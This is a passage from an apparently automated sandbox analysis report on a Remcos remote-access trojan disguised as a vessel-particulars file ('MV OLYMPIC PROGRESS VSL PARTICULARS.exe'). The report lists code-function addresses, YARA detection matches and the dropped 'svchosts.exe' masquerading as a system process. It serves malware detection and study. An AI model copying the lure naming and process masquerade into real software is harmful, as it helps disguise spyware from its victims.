          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4898023_2_06E48980
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4A6C823_2_06E4A6C8
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4A6B823_2_06E4A6B8
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E40E9223_2_06E40E92
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4BFC023_2_06E4BFC0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4B5B023_2_06E4B5B0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4BD9223_2_06E4BD92
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4E3C023_2_06E4E3C0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4737623_2_06E47376
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4BB4A23_2_06E4BB4A
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4BB5823_2_06E4BB58
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4733523_2_06E47335
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4E8C123_2_06E4E8C1
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4E8D023_2_06E4E8D0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4E87023_2_06E4E870
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4004023_2_06E40040
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4680823_2_06E46808
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4001D23_2_06E4001D
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4B96223_2_06E4B962
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4B96823_2_06E4B968
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_06E4E97223_2_06E4E972
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_00F4E75825_2_00F4E758
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_00F4E74A25_2_00F4E74A
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_00F4BD7425_2_00F4BD74
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_0295173825_2_02951738
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_02951F9025_2_02951F90
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_02951CD125_2_02951CD1
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_0295220125_2_02952201
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_0295001925_2_02950019
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_0295004025_2_02950040
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_0295062125_2_02950621
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_0295066825_2_02950668
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_0295172825_2_02951728
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_029519D025_2_029519D0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_0295696B25_2_0295696B
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_02951F8025_2_02951F80
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_054CBDA025_2_054CBDA0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_054C1F1825_2_054C1F18
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_054C0F1025_2_054C0F10
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_054CA6C825_2_054CA6C8
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_054CB96825_2_054CB968
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_054C898025_2_054C8980
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_054C004025_2_054C0040
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_054C680825_2_054C6808
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_054C000625_2_054C0006
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_054CE8D025_2_054CE8D0
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_054CBB5825_2_054CBB58
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_054C7BD825_2_054C7BD8
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_054C739825_2_054C7398
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_054C739325_2_054C7393
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: String function: 0040FC1A appears 54 times
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: String function: 0040FCBA appears 34 times
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.305795237.0000000006BB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.297503108.00000000036D9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000000.205048582.0000000000404000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDnUSdBB.exeD vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.296596429.00000000026D1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWindowsNetwork.dll> vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000011.00000002.303268232.0000000003420000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000011.00000000.293608691.0000000001044000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDnUSdBB.exeD vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000011.00000002.303534755.0000000003480000.00000002.00000001.sdmpBinary or memory string: originalfilename vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000011.00000002.303534755.0000000003480000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exeBinary or memory string: OriginalFilenameDnUSdBB.exeD vs MV OLYMPIC PROGRESS VSL PARTICULARS.exe
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000017.00000002.409864632.000000000404F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000016.00000002.392156248.00000000041AF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000019.00000002.424438341.0000000003C0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000000.00000002.298701013.00000000038BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 36.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 36.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 36.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 36.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 36.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 36.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 22.2.svchosts.exe.2ff0a64.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
          Source: 33.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 33.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 33.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 23.2.svchosts.exe.4107268.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 23.2.svchosts.exe.4107268.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 22.2.svchosts.exe.4267268.3.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 22.2.svchosts.exe.4267268.3.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 22.2.svchosts.exe.4267268.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.raw.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 0.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.3977268.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 23.2.svchosts.exe.4107268.3.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 23.2.svchosts.exe.4107268.3.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 23.2.svchosts.exe.4107268.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 25.2.svchosts.exe.3cc7268.4.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 25.2.svchosts.exe.3cc7268.4.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 25.2.svchosts.exe.3cc7268.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 22.2.svchosts.exe.4267268.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 22.2.svchosts.exe.4267268.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 31.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 31.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 31.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 25.2.svchosts.exe.3cc7268.4.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 25.2.svchosts.exe.3cc7268.4.raw.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 25.2.svchosts.exe.2a50a64.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
          Source: 23.2.svchosts.exe.2e90a64.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_Modified_SystemExeFileName_in_File date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detecst a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a
          Source: 33.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 33.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 33.2.svchosts.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 17.2.MV OLYMPIC PROGRESS VSL PARTICULARS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 31.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 31.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
          Source: 31.2.svchosts.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: svchosts.exe.17.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/6@0/2
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040CA41 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,17_2_0040CA41
